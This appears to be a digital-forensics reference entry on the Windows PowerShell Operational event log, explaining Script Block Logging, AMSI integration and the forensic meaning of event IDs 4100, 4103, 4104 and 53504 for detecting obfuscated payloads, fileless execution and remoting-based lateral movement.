PowerShell/Operational.evtx

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

PowerShell is the weapon of choice for post-exploitation - it is built-in, trusted by the OS and capable of nearly anything. Microsoft responded by introducing Script Block Logging, which captures the full decoded content of every script block as the runtime processes it. Even heavily obfuscated payloads are recorded in their deobfuscated form, making this log nightmare fuel for attackers who rely on PowerShell for stealth.

Log Channel Microsoft-Windows-PowerShell/Operational - written by the PowerShell engine (AMSI-integrated)

Trace Type Execution Script Content Remoting

Req. Audit Policy Yes Script Block Logging and Module Logging must be enabled via Group Policy under Administrative Templates > Windows Components > Windows PowerShell.

User Specific No System-wide. Captures PowerShell activity from all user sessions including SYSTEM-context scripts.

General

The PowerShell Operational log is produced by the Windows PowerShell engine and, when Script Block Logging is enabled, records the full text of every script block at the point of compilation - before execution. This process is integrated with the Antimalware Scan Interface (AMSI), meaning that even if an attacker attempts to bypass AMSI, the script content is still written to the event log first. Large scripts are split across multiple 4104 events with a sequence number, so reconstruction requires aggregating all fragments. The log is an essential complement to Security Event 4688 (process creation), providing the actual script content where 4688 only gives you the command line.

Traces

The most forensically significant Event IDs in the PowerShell Operational log are:

Event ID	Description
4100	Error record from the PowerShell engine. Contains error messages, stack traces and the context in which a failure occurred.
4103	Module Logging. Shows the PowerShell pipeline execution context including the command name, parameters and user identity.
4104	Script Block Logging. Records the full decoded content of the executed script block. Large scripts are split across multiple events with a MessageNumber/MessageTotal field for reassembly.
53504	PowerShell remoting session established. Indicates that a remote session (WinRM) was initiated - a common lateral movement vector.

Forensic Value

Recover obfuscated payloads: Event ID 4104 captures the deobfuscated script block the runtime compiled - meaning Base64-encoded, string-concatenated or character-substitution obfuscation is transparently unwound before logging.
Attribute in-memory execution: Fileless attacks that download and execute payloads entirely in memory leave no file on disk but leave the full script content in the PowerShell Operational log.
Detect common attack frameworks: Strings from Cobalt Strike, Empire, PowerSploit and Mimikatz appear verbatim in 4104 events, allowing direct signature-based detection even without EDR.
Identify lateral movement via remoting: Event 53504 tied to a specific source IP and user account provides a concrete record of PowerShell-based remote execution across hosts.